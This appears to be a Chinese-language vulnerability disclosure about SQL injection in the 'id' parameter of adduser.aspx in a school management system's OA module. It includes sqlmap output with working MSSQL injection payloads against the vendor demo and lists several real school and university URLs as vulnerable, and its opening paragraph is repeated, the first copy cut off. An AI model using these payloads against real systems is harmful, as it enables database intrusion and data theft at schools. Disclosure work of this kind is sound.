### 简要描述: 前台走一走 ### 详细说明: 问题厂商:上海安脉计算机科技有限公司 谷歌百度:版权所有:上海安脉计算机科技有限公司 大量学校使用该系统 管理平台没发现漏洞,但是这套系统附带一套oa系统 /anmai/oa/adduser.aspx 在密码出现sql注入 只能手工不好利用 [<img src="https://images.seebug.org/upload/201409/191116461c4d6afe69e6eb2112b1e35917432117.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/191116461c4d6afe69e6eb2112b1e35917432117.jpg) [<img src="https://images.seebug.org/upload/201409/1911165466501d749c7c4e82fc7ad2797fec7ccf.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1911165466501d749c7c4e82fc7ad2797fec7ccf.jpg) 但是 这有个用户修改 只需添加参数id /anmai/oa/adduser.aspx?id=1 (id存在注入) 以该公司demo为例 http://www.anmai.net/anmai/oa/adduser.aspx?id=1 Place: GET Parameter: id Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=1' AND 9850=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (9850=9850)...
### 简要描述: 前台走一走 ### 详细说明: 问题厂商:上海安脉计算机科技有限公司 谷歌百度:版权所有:上海安脉计算机科技有限公司 大量学校使用该系统 管理平台没发现漏洞,但是这套系统附带一套oa系统 /anmai/oa/adduser.aspx 在密码出现sql注入 只能手工不好利用 [<img src="https://images.seebug.org/upload/201409/191116461c4d6afe69e6eb2112b1e35917432117.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/191116461c4d6afe69e6eb2112b1e35917432117.jpg) [<img src="https://images.seebug.org/upload/201409/1911165466501d749c7c4e82fc7ad2797fec7ccf.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1911165466501d749c7c4e82fc7ad2797fec7ccf.jpg) 但是 这有个用户修改 只需添加参数id /anmai/oa/adduser.aspx?id=1 (id存在注入) 以该公司demo为例 http://www.anmai.net/anmai/oa/adduser.aspx?id=1 Place: GET Parameter: id Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=1' AND 9850=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (9850=9850) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(103)+CHAR(113))) AND 'HCnH'='HCnH Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=1' UNION ALL SELECT 67,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(76)+CHAR(90)+CHAR(67)+CHAR(75)+CHAR(67)+CHAR(72)+CHAR(80)+CHAR(66)+CHAR(86)+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(103)+CHAR(113),67,67,67,67,67,67-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=1' WAITFOR DELAY '0:0:5'-- --- [11:10:22] [INFO] testing Microsoft SQL Server [11:10:22] [INFO] confirming Microsoft SQL Server [11:10:26] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows web application technology: ASP.NET, Nginx, ASP.NET 1.1.4322 back-end DBMS: Microsoft SQL Server 2005 [11:10:26] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 32 times [11:10:26] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.anmai.net' ### 漏洞证明: 其他例供证明: http://bssyxxgl.eicbs.com/anmai/oa/addUser.aspx?id=1 http://www.gxbyzx.cn:88/ANMAI/oa/adduser.aspx?id=1 http://www.aqyz.net/anmai/oa/adduser.aspx?id=1 http://ps.imau.edu.cn/anmai/oa/addUser.aspx?id=1
